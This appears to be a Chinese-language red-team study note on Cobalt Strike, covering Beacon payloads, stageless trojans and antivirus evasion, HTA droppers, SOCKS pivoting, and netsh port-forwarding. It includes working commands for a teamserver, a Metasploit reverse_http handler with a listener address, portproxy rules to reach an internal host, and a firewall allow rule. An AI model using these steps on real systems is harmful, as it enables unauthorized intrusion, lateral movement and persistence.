28.Cobalt Strike
Cobalt Strike
Cobalt Strike 简介
C/S 客户端+服务端
Cobalt Strike(简称 CS),商业级红蓝对抗渗透测试平台,多用于内网渗透、权限维持、横向移动,主流红队工具。
一、核心定位
- 架构:C/S 客户端 + 服务端,团队多人协同作战
- 用途:漏洞利用、木马远控、内网漫游、提权、流量代理、溯源反制
- 适用:Windows/Linux/macOS 全平台被控
二、核心组件
-
TeamServer 团队服务端
程序中枢,承载流量、会话存储、任务转发,对外暴露 IP 端口,被控主机回连至此。
-
GUI 图形客户端
运维操作界面,创建监听器、生成木马、下发命令、管理上线主机。
-
Beacon 被控载荷
运行在目标机器的木马程序,接收服务端指令,执行命令、文件操作、屏幕监控等。
三、关键常用功能
-
监听器 Listener
配置回连协议、IP、端口,支持 HTTP/HTTPS/TCP/SMB 等,避开封禁端口。
-
载荷生成
产出 exe、powershell、dll、shellcode 等各类木马,适配不同上线场景。
-
基础远控
执行系统命令、文件上传下载、进程管理、注册表操作。
-
权限提升
本地提权获取系统最高权限。
-
内网横向
哈希传递、远程桌面、WMI、SMB 远程访问,扩散控制范围。
-
流量代理
搭建隧道,以被控机为跳板访问内网资产。
-
持久化
开机自启、账号后门,长期维持访问权限。
-
信息搜集
抓取账号密码、系统、网络、域环境信息。
四、通信特点
- 默认间歇式心跳上线,隐蔽性强,降低被杀软、防火墙检测概率
- 支持流量加密、流量混淆,规避流量审计
- 可自定义心跳间隔、回包形态
五、常见使用流程
- 部署启动 TeamServer 服务端
- 本地客户端连接服务端
- 创建对应协议监听器
- 生成适配目标系统的木马载荷
- 植入目标主机运行,等待 Beacon 上线
- 下发指令,开展提权、内网渗透、数据获取等操作
六、风险与合规
- 属于黑客工具,无合法授权测试、擅自入侵计算机系统触犯法律
- 易被杀毒软件、EDR、安全设备查杀拦截
- 攻防对抗中主要用于企业授权安全演练、漏洞自查
命令
./teamserver 192.168.152.33 hello #./teamserver ip(本机) password 服务端
./start.sh 客户端 #客户端服务端都在本机 ip不变 密码 hello




stageless 木马
什么是 Stageless?
Stageless = 无分段、单文件、完整直接上线的 Beacon
-
Staged(分段):
先传一个小体积 loader(stager),再从服务端下载完整 Beacon(stage)
→ 容易被杀、不稳定、网络差就掉线
-
Stageless(无分段):
完整 Beacon 直接打包在 payload 里,运行就直接上线
→ 更稳定、更隐蔽、免杀更好、内网穿透更强
CS 里 Stageless 长什么样?
你在 CS 里看到的这些,全是 Stageless:
- Windows Executable (Stageless)
- Windows Executable (S) (Stageless)
- Windows Service EXE (Stageless)
- Raw Payload (Stageless)
- Beacon Payload Generator 里的 Stageless 选项
Staged 和 Stageless 到底差在哪?(最重要)
| 类型 | 体积 | 网络要求 | 稳定性 | 免杀 |
|---|---|---|---|---|
| Staged(分段) | 小 | 必须能连 CS | 差 | 一般 |
| Stageless(无分段) | 大一点 | 断网也能运行 | 极高 | 极好 |

生成木马 选择监听器


上线木马
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.152.33 # msf所在主机的ip
set lport 7788 # msf所在主机自定义端口号
run

新建监听
office宏木马
office默认不开启宏
什么是 HTA 挂马?
HTA(HTML Application)是微软推出的一种可直接运行的 HTML 应用程序,它依托 mshta.exe 执行,本质上是一种 “伪装成网页的可执行程序”。
挂马的核心逻辑是:通过恶意 HTA 文件,利用其内置的 VBScript/JScript 执行任意系统命令、下载并运行恶意程序,从而实现权限获取、会话上线等目的。
- 特点:无需用户手动保存文件,直接在浏览器 / 系统中打开即可执行代码;绕过部分安全软件的网页脚本拦截。
- 常见场景:钓鱼攻击、内网横向移动、无文件落地攻击。
sock代理
SOCKS 是网络代理协议,常用 SOCKS4、SOCKS5
SOCKS5:支持账号密码、UDP、IP 解析,渗透最常用
作用:本机流量 → 代理跳板机 → 访问内网其他机器
用途:内网横向、扫描内网、远程连接、漏洞探测
https://cloud.tencent.com/developer/article/2148922
实现内网渗透
netsh端口转发
Windows 本机做流量中转,实现端口映射、内网穿透、流量转发
# 添加转发
netsh interface portproxy add v4tov4 listenport=监听端口 listenaddress=0.0.0.0 connectport=目标端口 connectaddress=目标IP
# 查看所有转发规则
netsh interface portproxy show all
# 删除单条规则
netsh interface portproxy delete v4tov4 listenport=监听端口 listenaddress=0.0.0.0
# 清空全部转发
netsh interface portproxy reset
netsh interface portproxy add v4tov4 listenport=9090 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.2.30
跳板机监听本机 9090 端口,把访问跳板机 9090 的流量,转发到内网机器 `192.168.2.30:80`
防火墙放行
# 放行监听端口
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="port8888" dir=in action=allow protocol=TCP localport=8888 remoteip=any enable=yes
cobalt strike 提权插件
cobalt strike免杀

浙公网安备 33010602011771号